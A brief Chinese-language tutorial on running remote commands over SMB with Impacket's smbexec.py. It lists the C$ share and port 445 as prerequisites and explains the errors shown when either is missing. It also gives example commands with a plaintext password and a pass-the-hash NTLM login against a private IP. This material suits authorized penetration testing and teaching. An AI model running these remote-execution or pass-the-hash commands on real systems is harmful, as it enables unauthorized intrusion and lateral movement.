smbexec的使用(c$共享)
smbexec工具可以利用文件共享在远程系统中执行命令。使用该工具时,对方主机需要开启c$共享,并且依赖于445端口。
如果对方主机未开启445端口,您将遇到如下错误:
[-] [Errno Connection error (xx.xx.xx.xx:445)] [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。

如果对方主机虽然开启了445端口,但没有开启c$共享,您将遇到如下错误:
[-]SMB Session Error: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)

在Impacket工具集中,smbexec.py脚本可以用来执行远程命令。以下是使用smbexec.py的命令示例:
./smbexec.py xie/hack:x123456@192.168.10.130 ./smbexec.py xie/hack@192.168.10.130 -hashes aada8eda23213c027743e6c498d751aa:b98e75b5ff7a3d3ff05e07f211ebe7a8











